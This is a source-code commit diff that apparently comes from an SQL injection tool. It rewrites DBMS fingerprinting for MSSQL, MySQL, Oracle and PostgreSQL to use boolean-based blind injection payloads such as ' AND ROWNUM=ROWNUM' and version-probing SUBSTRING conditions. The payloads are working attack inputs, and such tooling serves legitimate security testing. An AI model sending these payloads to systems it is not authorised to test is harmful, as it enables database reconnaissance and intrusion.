Major speed increase in DBMS basic fingerprint

2024-11-25 11:03:47 +03:00 · 2008-12-22 23:26:44 +00:00 · 2008-12-22 23:26:44 +00:00 · 79c8d63b88
commit 79c8d63b88
parent 64bb57d786
4 changed files with 43 additions and 24 deletions
--- a/plugins/dbms/mssqlserver.py
+++ b/plugins/dbms/mssqlserver.py
@ -177,18 +177,24 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
        logger.info(logMsg)

        randInt = str(randomInt(1))
-        query   = "LTRIM(STR(LEN(%s)))" % randInt

-        if inject.getValue(query) == "1":
-            query   = "SELECT SUBSTRING((@@VERSION), 25, 1)"
-            version = inject.getValue(query)
+        payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
+        result  = Request.queryPage(payload)

-            if version == "8":
-                kb.dbmsVersion = ["2008"]
-            elif version == "5":
-                kb.dbmsVersion = ["2005"]
-            elif version == "0":
-                kb.dbmsVersion = ["2000"]
+        if result == True:
+            for version in ( 0, 5, 8 ):
+                payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
+                result  = Request.queryPage(payload)
+
+                if result == True:
+                    if version == 8:
+                        kb.dbmsVersion = ["2008"]
+                    elif version == 5:
+                        kb.dbmsVersion = ["2005"]
+                    elif version == 0:
+                        kb.dbmsVersion = ["2000"]
+
+                    break

            if kb.dbmsVersion:
                setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
--- a/plugins/dbms/mysql.py
+++ b/plugins/dbms/mysql.py
@ -249,15 +249,18 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
        logger.info(logMsg)

        randInt = str(randomInt(1))
-        query = "CONCAT('%s', '%s')" % (randInt, randInt)

-        if inject.getValue(query) == (randInt * 2):
+        payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
+        result  = Request.queryPage(payload)
+
+        if result == True:
            logMsg = "confirming MySQL"
            logger.info(logMsg)

-            query = "LENGTH('%s')" % randInt
+            payload = agent.fullPayload(" AND CONCAT('%s', '%s')='%s%s'" % (randInt, randInt, randInt, randInt))
+            result  = Request.queryPage(payload)

-            if not inject.getValue(query) == "1":
+            if result != True:
                warnMsg = "the back-end DMBS is not MySQL"
                logger.warn(warnMsg)

--- a/plugins/dbms/oracle.py
+++ b/plugins/dbms/oracle.py
@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

 import re

+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@ -38,6 +39,7 @@ from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import ORACLE_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request

 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@ -163,17 +165,17 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
        logMsg = "testing Oracle"
        logger.info(logMsg)

-        query = "LENGTH(SYSDATE)"
-        sysdate = inject.getValue(query)
+        payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
+        result  = Request.queryPage(payload)

-        if sysdate and int(sysdate) > 0:
+        if result == True:
            logMsg = "confirming Oracle"
            logger.info(logMsg)

-            query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
-            version = inject.getValue(query)
+            payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
+            result  = Request.queryPage(payload)

-            if not version:
+            if result != True:
                warnMsg = "the back-end DMBS is not Oracle"
                logger.warn(warnMsg)

@ -186,6 +188,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
            if not conf.extensiveFp:
                return True

+            query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
+            version = inject.getValue(query)
+
            if re.search("^11", version):
                kb.dbmsVersion = ["11i"]
            elif re.search("^10", version):
--- a/plugins/dbms/postgresql.py
+++ b/plugins/dbms/postgresql.py
@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

 import re

+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@ -39,6 +40,7 @@ from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import PGSQL_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request

 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@ -168,15 +170,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
        logger.info(logMsg)

        randInt = str(randomInt(1))
-        query = "COALESCE(%s, NULL)" % randInt

-        if inject.getValue(query) == randInt:
+        payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
+        result  = Request.queryPage(payload)
+
+        if result == True:
            logMsg = "confirming PostgreSQL"
            logger.info(logMsg)

-            query = "LENGTH('%s')" % randInt
+            payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
+            result  = Request.queryPage(payload)

-            if not inject.getValue(query) == "1":
+            if result != True:
                warnMsg = "the back-end DMBS is not PostgreSQL"
                logger.warn(warnMsg)